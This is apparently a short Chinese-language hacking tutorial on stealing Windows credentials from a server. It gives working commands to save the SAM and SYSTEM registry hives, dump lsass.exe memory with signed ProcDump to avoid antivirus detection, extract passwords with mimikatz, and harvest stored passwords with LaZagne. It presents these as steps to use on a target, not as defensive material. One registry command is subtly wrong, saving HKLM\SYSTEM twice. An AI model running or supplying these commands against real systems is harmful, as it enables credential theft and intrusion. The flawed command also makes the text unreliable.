Mimikatz
Mimikatz又被称为法国大面包,是一款windows平台的神器,他最显著的功能就是从lsass.exe中抓取密码,此外它还可以用于提权、注入进程,读取进程内存等操作。但是Mimikatz没有经过处理直接扔到服务器上,200%会被杀软杀掉。因此,我们需要通过别的手段去抓取数据到本地。
通过注册表抓取
获取注册表中的信息:
执行这两条命令需要管理员权限reg save HKLM\SYSTEM c:\windows\temp\Sys.hiv reg save HKLM\SYSTEM c:\windows\temp\Sam.hiv
把这两个文件拉取到本地,执行命令:
mimikatz "lsadump::sam /sam:Sam.hiv /system:Sys.hiv" exit
lsass.exe内存抓取
如果有一些账号登录本机,如域管理员等,这些登录信息会被储存在lsass.exe这个进程中,通过内存抓取可以获得这些信息。
用到的工具:Procdump,此工具有微软的官方签名,大部分的杀软都不会查杀
下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/
将对应的Procdump上传到服务器中,执行procdump64.exe -accepteula -ma lsass.exe lsass.dmp
将生成的dmp文件拉到本地,执行命令
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit在windows 2008前密码都是明文存储,在2008之后系统会进行hash加密再存储
LaZagne
下载地址 http://github.com/AlessandroZ/LaZagne
下载源码,并按照github上的说明安装一些模块,在python3下的环境运行python3 laZagne.py allLaZagne可以抓取多种在计算机中储存的密码,如vnc、浏览器存储的密码、数据库密码、Hashdump等。
